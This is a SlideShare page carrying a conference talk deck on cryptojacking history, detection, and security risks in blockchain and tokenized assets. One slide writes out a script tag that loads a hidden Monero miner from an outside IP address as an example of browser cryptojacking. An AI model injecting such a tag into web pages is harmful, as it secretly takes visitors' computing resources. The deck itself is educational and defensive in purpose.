SlideShare a Scribd company logo
Evolution of a
Hack
CryptoJacking, CryptoCurrencies, and Blockchains
Preliminaries
▪ Bryan Becker, CISSP, CCSP
▪ More Futurist, less Crypto-Maximalist
▪ Terrified of CRISPR
▪ All opinions my own and not that of my
employer.
▪ DISCLAIMER: Bad Words!
▪ I Promise.
▪ Slap me if I talk about bitcoin price.
▪ None of this should be considered financial
advice.
Agenda
▪ CryptoJacking and newer, rebranded attacks against companies with efforts to
exploit resources using blockchain public chains and technologies.
▪ Are we ready for an “Internet of Literal Things Encapsulated in Tokens” revolution
from a security perspective?
Top 5 Uses of Public Blockchain Tokens!
▪ GIVEAWAY
▪ #5 – Useless Ethereum Token (UET)
▪ FAQ: “Wait … is this a joke? Is it a scam? Neither! This is real — and it’s 100%
transparent. You’re literally giving your money to someone on the internet and getting
completely useless tokens in return.”
▪ #4 -- SpankChain
▪ #3 -- PotCoin
▪ #2 – C**kBlockChain
▪ #1 -- F*ckToken -- $0.00005.
What is Blockchain anyways?
Blockchain Fundamentals
▪ Distributed Ledger
▪ Consensus by Code
▪ Digital Scarcity
▪ Programmability (Smart Contracts)
Blockchain Fundamentals - “What is a Wallet”
▪ AN INTERFACE WHICH INTERACTS WITH A BLOCKCHAIN.
▪ It doesn’t store money, it stores and interacts private keys .
▪ It’s not a “place”, it’s an interface to pub/private key pairs to handle crypto assets.
▪ It can be…
▪ As simple as a piece of paper
▪ A fat client
▪ Mobile App
▪ Browser Extension
▪ Hardware token
How Proof of Work Consensus Works
▪ Transactions get broadcasted to a
node
▪ Node adds transaction to a block
(small file of transactions)
▪ All other validators do math during
the blocktime.
▪ One validator wins the block
discovery, adds the block to the
chain, and “wins” the lottery for
freshly minted tokens for security
incentive for ”Proof of Work”
How Monero Works
CryptoJacking History
▪ Bitcoin browser-based mining: A thing since 2011.
▪ No ASICS
▪ Bitcoin was cheap and mining was profitable (don’t slap me!)
▪ Bitcoinplus.com
▪ Mostly disappeared with the onset of new technology.
▪ More things change, the more they stay the same…
Current Risk: CryptoJacking
▪ CryptoJacking a.k.a. Harvest of distributed computing resources (CPU, Memory, Disk,
Bandwidth) for financial gain of attacker.
▪ With the coin mining gold rush, cryptojacking attacks skyrocketed 8,500 percent
▪ DRUPALGEDDON 2: 400 Drupal Websites hit using latest vuln.
▪ Shopify Plugin creates 5 iFrames which mines Monero.
▪ Showtime, UFC.TV.
▪ Weatherfor.us plugin for websites injects mining scripts.
▪ Fileless malware Ghostminer kills other cryptojacking competitors and mines in
memory and is nearly undetectable.
▪ CoinHive == CryptoJacking as a Service (CJaaS?)
It’s Literally This Easy (Invisible Browser Mining)
<script type='text/javascript' src='http://174.138.43.214/wp-
content/plugins/simple-monero-miner-coin-hive/js/smmch-
mine.js?v=1.4&#038;ver=4.9.5'></script>
Open source rig: https://github.com/xmrig/xmrig
Detection and Prevention
▪ Mostly detected at the network level (now)
▪ Resource Utilization and Monitoring
▪ Browser Level Detections via Software or Extensions (NoCoin, MinerBlock)
▪ Injection detection.
▪ No-Script
▪ IDS/IPS rules for DNS calls (DNS sinkholes)
▪ Anomaly Detection for Network Baseline monitoring
▪ BUILT-IN BROWSER restrictions
▪ NUCLEAR OPTION: Disable JavaScript
DEMO!!!!
▪ DEMO WORLD, PARTY TIME, EXCELLENT!
CryptoJacking
Future/Potential
▪ Why the resurgence?
▪ Privacy Based Coins
▪ Ease of Deployment
▪ Hard to find if throttled
▪ Mobile explosion
▪ Fundamental Profitability
Problem
▪ CoinHive maxed out at 13.5 MH/s
== ~5% of the Monero Hash Pool. Month by Month percentage change in
Browser-based Mining. (Symantec)
Future Forms of
CryptoJacking
▪ The Future of Monetization
▪ Evolution of current attacks
▪ WannaMine worm (ETERNALBLUE)
▪ GhostMiner
▪ GPU, File Storage
▪ IoT-focused CryptoJacking
▪ RadiFlow ICS Mining
▪ NEW TARGETS
▪ Fogs
▪ Kubernetes Clusters
CryptoJacking for Charity!
▪ UNICEF
▪ www.thehopepage.org
https://www.nvidia.com/object/what-is-gpu-computing.html
Part 2
Evolution of a Hack  Tokenized “Asset-ful” Data Structures
Security with Tokenized “Asset-ful” Data
Structures
▪ “I recall hearing in recent years, if you were a “startup” until you reached a
certain revenue threshold, security should not be a major concern or spend
area.” – Director-level Consultant in Boulder.
▪ You cannot mess up something decentralized in a fundamental way;
anything less than absolute correctness is absolute failure. — Charles
Noyes
The Internet of Money
▪ Web 3.0!
▪ Tokenize ALL THE THINGS!
▪ Make the world more liquid!
▪ Assets on the blockchain!
▪ Eliminate the middle man with smart
contracts!
▪ EVERYTHING on the Blockchain!
▪ Health Records, Identity, Supply
Chains, Security Tokens, Real Assets
What a time to be alive!
▪ “We rarely see people talking about what will form the main usage of Blockchain:
Robots and Machines.
This isn't going to be about whether grandpa or grandma, mommy or daddy are
gonna want to use Blockchain or not.
We are talking about the billion of interconnected devices which, for the first time
in technological history, will be able to transact value from device to device, in a
safe, fast and trustable manner.”
▪ In the near-future, the Internet of Things will move money and assets
autonomously or as directed by a DAO or AI.
Adoption: Blockchain news from the past 4
weeks days.
▪ “In the future, owning an asset and not having it tokenized on the blockchain will
be the equivalent of owning a company and not being on the Internet today.”
– Crypto Hedge Funder
▪ Bloomberg and Galaxy Digital just announced they're launching a
cryptocurrency index to track 10 of the most liquid crypto assets.
▪ China's Ministry of Public Security is planning to use blockchain technology to
drastically improve their handling of evidence from police investigations.
▪ Facebook is launching an internal team to exclusively focus on blockchain tech.
The team is led by David Marcus, former PayPal President & current Coinbase
board member
Adoption: Blockchain news from the past 4
weeks days.
▪ Oracle, the fourth largest software company in the world according to Forbes, is
launching their blockchain products this month.
▪ Consensys and Saudi Arabia‘s Ministry of Communications and Information
Technology recently held a blockchain bootcamp to teach the skills necessary for
this new world.
▪ JPMorgan filed a patent to use blockchain for Bank-to-Bank transactions.
▪ Goldman Sachs is opening a Bitcoin trading operation.
▪ The South Korean Central Bank is planning to use cryptocurrencies to achieve
a truly cashless society by 2020
Wall Street Journal: Paul Vizla
Wait, WHAT?!??! WHAT ARE WE THINKING
▪ Coinbase Bug Allowed Users to Give
Themselves Unlimited Ether - Gizmodo
▪ Founders of a cryptocurrency backed by
Floyd Mayweather charged with fraud by
SEC - CNBC
Wait, WHAT?!??! WHAT ARE WE THINKING
• Malware which monitors clipboards.
• Smart Contract coding vulnerabilities (PARITY)
Blockchains and Government
▪ Governments which recognize Smart Contracts as law
▪ Tennessee
▪ Arizona
▪ Florida
▪ More to come
Some Inconvenient Truths
▪ Most dApps don’t even need a blockchain.
▪ Users can’t even handle a password, now you want them a wallet and a private key?
▪ CONFIDENTIALITY BROKEN.
▪ Smart Contracts are still written by humans.
▪ Criminals flock to where the low hanging fruit is.
Some Inconvenient Truths
▪ Validator nodes are still servers run by someone.
▪ Internal blockchains validator nodes still are servers handled by humans.
▪ INTEGRITY BROKEN.
▪ PARADIGM CHALLENGE
▪ “Move fast and break” things for systems with tokenized assets is not an effective
development strategy.
▪ Check ourselves before we wreck ourselves.
▪ Governance, governance, governance.
The Power of Programmers:
A New Ethics Dilemma
▪ Security Token explosion coming.
▪ Assets, such as houses, supply chains, physical money, gold bullion.
▪ Programmers writing protocols which:
▪ Store assets.
▪ Move assets
▪ Use smart contracts to hold assets in “virtual escrow”
▪ These protocols will run be the foundation of mutual funds, asset portfolios,
money transfers, holding institutions, and the like.
Recommendations for our Industry
▪ NIST guidance paper(s) and Blockchain Security Framework.
▪ Overall guidelines on the tech and deployment.
▪ Internal Governance.
▪ GLB-like law for FinTech with Blockchains.
▪ Privacy Law Update. Blockchain Won’t Make it Better.
▪ Makes Law Enforcement that much harder.
▪ Massive Education Investments needed.
Recommendations for our Industry
▪ Reuse the Good Code!
▪ Opensource Shared User Models and pre-Deployed Contract Modules.
▪ KNOW YOUR RISK: Flipping the Development Paradigm on it’s head.
▪ Move slow so no one loses their house. Security First!
▪ Develop more smart contract auditors.
▪ Inning 2. Know Risks, Continue to Improve.
<FIN>
▪ Questions and Answer.
▪ QR me 
▪ Bryan Becker
▪ @_beckerb

More Related Content

What's hot

CYBERSECURITY WEYAI.pptx
CYBERSECURITY WEYAI.pptxCYBERSECURITY WEYAI.pptx
CYBERSECURITY WEYAI.pptx
Weyai1
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
Michael Gough
 
seminar report on What is ransomware
seminar report on What is ransomwareseminar report on What is ransomware
seminar report on What is ransomware
Jawhar Ali
 
Threat Intelligence in Cyber Risk Programs
Threat Intelligence in Cyber Risk ProgramsThreat Intelligence in Cyber Risk Programs
Threat Intelligence in Cyber Risk Programs
Rahul Neel Mani
 
Ransomware Attack.pptx
Ransomware Attack.pptxRansomware Attack.pptx
Ransomware Attack.pptx
IkramSabir4
 
Cyber security
Cyber securityCyber security
Cyber security
Sabir Raja
 
Cyber security presentation
Cyber security presentation Cyber security presentation
Cyber security presentation
sweetpeace1
 
Ransomware - The Growing Threat
Ransomware - The Growing ThreatRansomware - The Growing Threat
Ransomware - The Growing Threat
Nick Miller
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
Mahabubur Rahman
 
CyberCrimes
CyberCrimesCyberCrimes
CyberCrimes
Fettah Kurtulus
 
Artificial Intelligence and Machine Learning for Cybersecurity
Artificial Intelligence and Machine Learning for CybersecurityArtificial Intelligence and Machine Learning for Cybersecurity
Artificial Intelligence and Machine Learning for Cybersecurity
Dr David Probert
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
Dhruv Majumdar
 
Power point cybercrime
Power point cybercrimePower point cybercrime
Power point cybercrime12698
 
Ransomware
RansomwareRansomware
Ransomware
Nick Miller
 
Cyber Attack Methodologies
Cyber Attack MethodologiesCyber Attack Methodologies
Cyber Attack Methodologies
Geeks Anonymes
 
The Secret Of Hacking Trial Pages
The Secret Of Hacking   Trial PagesThe Secret Of Hacking   Trial Pages
The Secret Of Hacking Trial Pages
leoimpact
 
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE - ATT&CKcon
 
The Proactive Approach to Cyber Security
The Proactive Approach to Cyber SecurityThe Proactive Approach to Cyber Security
The Proactive Approach to Cyber Security
Nathan Desfontaines
 
Outpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface managementOutpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface management
Outpost24
 

What's hot (20)

CYBERSECURITY WEYAI.pptx
CYBERSECURITY WEYAI.pptxCYBERSECURITY WEYAI.pptx
CYBERSECURITY WEYAI.pptx
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 
seminar report on What is ransomware
seminar report on What is ransomwareseminar report on What is ransomware
seminar report on What is ransomware
 
Threat Intelligence in Cyber Risk Programs
Threat Intelligence in Cyber Risk ProgramsThreat Intelligence in Cyber Risk Programs
Threat Intelligence in Cyber Risk Programs
 
Ransomware Attack.pptx
Ransomware Attack.pptxRansomware Attack.pptx
Ransomware Attack.pptx
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber security presentation
Cyber security presentation Cyber security presentation
Cyber security presentation
 
Ransomware - The Growing Threat
Ransomware - The Growing ThreatRansomware - The Growing Threat
Ransomware - The Growing Threat
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
 
CyberCrimes
CyberCrimesCyberCrimes
CyberCrimes
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Artificial Intelligence and Machine Learning for Cybersecurity
Artificial Intelligence and Machine Learning for CybersecurityArtificial Intelligence and Machine Learning for Cybersecurity
Artificial Intelligence and Machine Learning for Cybersecurity
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
Power point cybercrime
Power point cybercrimePower point cybercrime
Power point cybercrime
 
Ransomware
RansomwareRansomware
Ransomware
 
Cyber Attack Methodologies
Cyber Attack MethodologiesCyber Attack Methodologies
Cyber Attack Methodologies
 
The Secret Of Hacking Trial Pages
The Secret Of Hacking   Trial PagesThe Secret Of Hacking   Trial Pages
The Secret Of Hacking Trial Pages
 
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
 
The Proactive Approach to Cyber Security
The Proactive Approach to Cyber SecurityThe Proactive Approach to Cyber Security
The Proactive Approach to Cyber Security
 
Outpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface managementOutpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface management
 

Similar to CryptoJacking and Security: Evolution of a Hack

Quick Understanding of Bitcoin/Cryptocurrency.
Quick Understanding of Bitcoin/Cryptocurrency.Quick Understanding of Bitcoin/Cryptocurrency.
Quick Understanding of Bitcoin/Cryptocurrency.
Satish Mudaliar
 
Quick Understanding of Bitcoin/Cryptocurrency.
Quick Understanding of Bitcoin/Cryptocurrency.Quick Understanding of Bitcoin/Cryptocurrency.
Quick Understanding of Bitcoin/Cryptocurrency.
Satish Mudaliar
 
Blockchain cryptocurrencies and banking
Blockchain cryptocurrencies and bankingBlockchain cryptocurrencies and banking
Blockchain cryptocurrencies and banking
Clémentine Grossetête
 
Hacking blockchain
Hacking blockchainHacking blockchain
Hacking blockchain
Jose L. Quiñones-Borrero
 
A Primer on Blockchain and its Potential, with a Focus on the GCC
A Primer on Blockchain and its Potential, with a Focus on the GCCA Primer on Blockchain and its Potential, with a Focus on the GCC
A Primer on Blockchain and its Potential, with a Focus on the GCC
Zeyad T. Al Mudhaf
 
Blockchains: Bitcoin was always so much more
Blockchains: Bitcoin was always so much moreBlockchains: Bitcoin was always so much more
Blockchains: Bitcoin was always so much more
Robin Teigland
 
CBGTBT - Part 1 - Workshop introduction & primer
CBGTBT - Part 1 - Workshop introduction & primerCBGTBT - Part 1 - Workshop introduction & primer
CBGTBT - Part 1 - Workshop introduction & primer
Blockstrap.com
 
blockchain-161025100639.pptx
blockchain-161025100639.pptxblockchain-161025100639.pptx
blockchain-161025100639.pptx
Praveenkumar155694
 
WHAT IS CRYPTOCURRENCY EXPECTED APPLICATIONS.
WHAT IS CRYPTOCURRENCY  EXPECTED APPLICATIONS.WHAT IS CRYPTOCURRENCY  EXPECTED APPLICATIONS.
WHAT IS CRYPTOCURRENCY EXPECTED APPLICATIONS.
Qutomatic
 
An Investigator’s Guide to Blockchain, Bitcoin and Wallet Transactions
An Investigator’s Guide to Blockchain, Bitcoin and Wallet TransactionsAn Investigator’s Guide to Blockchain, Bitcoin and Wallet Transactions
An Investigator’s Guide to Blockchain, Bitcoin and Wallet Transactions
Case IQ
 
Blockchain 101 - public, tokenized blockchains
Blockchain 101 - public, tokenized blockchainsBlockchain 101 - public, tokenized blockchains
Blockchain 101 - public, tokenized blockchains
Brett Colbert
 
Blockchain and Banking
Blockchain and BankingBlockchain and Banking
Blockchain and Banking
HyperTrends Global Inc.
 
State of Crypto in 2019
State of Crypto in 2019State of Crypto in 2019
State of Crypto in 2019
Kleiner Perkins
 
Dubai Blockchain_channel_22072018
Dubai Blockchain_channel_22072018Dubai Blockchain_channel_22072018
Dubai Blockchain_channel_22072018
Pekka Kelkka
 
Indjic fintech module 6
Indjic fintech module 6Indjic fintech module 6
Indjic fintech module 6
Drago Indjic
 
UNBLOCKED: The Power of Blockchain Technology to Establish Trust, Build Brand...
UNBLOCKED: The Power of Blockchain Technology to Establish Trust, Build Brand...UNBLOCKED: The Power of Blockchain Technology to Establish Trust, Build Brand...
UNBLOCKED: The Power of Blockchain Technology to Establish Trust, Build Brand...
Ogilvy Consulting
 
Cryptocurrencies and Blockchain technology
Cryptocurrencies and Blockchain technologyCryptocurrencies and Blockchain technology
Cryptocurrencies and Blockchain technology
Sabrina Kirrane
 
The Revolution of Crypto Funding - Building towards a Scamless Future
The Revolution of Crypto Funding - Building towards a Scamless FutureThe Revolution of Crypto Funding - Building towards a Scamless Future
The Revolution of Crypto Funding - Building towards a Scamless Future
Ruben Merre
 
Iceic2019 final presented
Iceic2019 final presentedIceic2019 final presented
Iceic2019 final presented
Heung-No Lee
 
Smart Contracts - The Blockchain Beyond Bitcoin
Smart Contracts - The Blockchain Beyond BitcoinSmart Contracts - The Blockchain Beyond Bitcoin
Smart Contracts - The Blockchain Beyond Bitcoin
Jim McKeeth
 

Similar to CryptoJacking and Security: Evolution of a Hack (20)

Quick Understanding of Bitcoin/Cryptocurrency.
Quick Understanding of Bitcoin/Cryptocurrency.Quick Understanding of Bitcoin/Cryptocurrency.
Quick Understanding of Bitcoin/Cryptocurrency.
 
Quick Understanding of Bitcoin/Cryptocurrency.
Quick Understanding of Bitcoin/Cryptocurrency.Quick Understanding of Bitcoin/Cryptocurrency.
Quick Understanding of Bitcoin/Cryptocurrency.
 
Blockchain cryptocurrencies and banking
Blockchain cryptocurrencies and bankingBlockchain cryptocurrencies and banking
Blockchain cryptocurrencies and banking
 
Hacking blockchain
Hacking blockchainHacking blockchain
Hacking blockchain
 
A Primer on Blockchain and its Potential, with a Focus on the GCC
A Primer on Blockchain and its Potential, with a Focus on the GCCA Primer on Blockchain and its Potential, with a Focus on the GCC
A Primer on Blockchain and its Potential, with a Focus on the GCC
 
Blockchains: Bitcoin was always so much more
Blockchains: Bitcoin was always so much moreBlockchains: Bitcoin was always so much more
Blockchains: Bitcoin was always so much more
 
CBGTBT - Part 1 - Workshop introduction & primer
CBGTBT - Part 1 - Workshop introduction & primerCBGTBT - Part 1 - Workshop introduction & primer
CBGTBT - Part 1 - Workshop introduction & primer
 
blockchain-161025100639.pptx
blockchain-161025100639.pptxblockchain-161025100639.pptx
blockchain-161025100639.pptx
 
WHAT IS CRYPTOCURRENCY EXPECTED APPLICATIONS.
WHAT IS CRYPTOCURRENCY  EXPECTED APPLICATIONS.WHAT IS CRYPTOCURRENCY  EXPECTED APPLICATIONS.
WHAT IS CRYPTOCURRENCY EXPECTED APPLICATIONS.
 
An Investigator’s Guide to Blockchain, Bitcoin and Wallet Transactions
An Investigator’s Guide to Blockchain, Bitcoin and Wallet TransactionsAn Investigator’s Guide to Blockchain, Bitcoin and Wallet Transactions
An Investigator’s Guide to Blockchain, Bitcoin and Wallet Transactions
 
Blockchain 101 - public, tokenized blockchains
Blockchain 101 - public, tokenized blockchainsBlockchain 101 - public, tokenized blockchains
Blockchain 101 - public, tokenized blockchains
 
Blockchain and Banking
Blockchain and BankingBlockchain and Banking
Blockchain and Banking
 
State of Crypto in 2019
State of Crypto in 2019State of Crypto in 2019
State of Crypto in 2019
 
Dubai Blockchain_channel_22072018
Dubai Blockchain_channel_22072018Dubai Blockchain_channel_22072018
Dubai Blockchain_channel_22072018
 
Indjic fintech module 6
Indjic fintech module 6Indjic fintech module 6
Indjic fintech module 6
 
UNBLOCKED: The Power of Blockchain Technology to Establish Trust, Build Brand...
UNBLOCKED: The Power of Blockchain Technology to Establish Trust, Build Brand...UNBLOCKED: The Power of Blockchain Technology to Establish Trust, Build Brand...
UNBLOCKED: The Power of Blockchain Technology to Establish Trust, Build Brand...
 
Cryptocurrencies and Blockchain technology
Cryptocurrencies and Blockchain technologyCryptocurrencies and Blockchain technology
Cryptocurrencies and Blockchain technology
 
The Revolution of Crypto Funding - Building towards a Scamless Future
The Revolution of Crypto Funding - Building towards a Scamless FutureThe Revolution of Crypto Funding - Building towards a Scamless Future
The Revolution of Crypto Funding - Building towards a Scamless Future
 
Iceic2019 final presented
Iceic2019 final presentedIceic2019 final presented
Iceic2019 final presented
 
Smart Contracts - The Blockchain Beyond Bitcoin
Smart Contracts - The Blockchain Beyond BitcoinSmart Contracts - The Blockchain Beyond Bitcoin
Smart Contracts - The Blockchain Beyond Bitcoin
 

Recently uploaded

Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
ViralQR
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 

Recently uploaded (20)

Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 

CryptoJacking and Security: Evolution of a Hack

